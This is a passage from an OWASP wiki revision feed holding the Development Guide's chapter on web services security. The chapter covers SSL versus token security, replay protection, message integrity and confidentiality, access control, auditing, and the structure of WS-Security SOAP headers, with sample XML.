&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59463</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59463"/>
				<updated>2009-04-26T11:35:05Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Access control */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations, which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        ''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/xenc:EncryptedKey&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
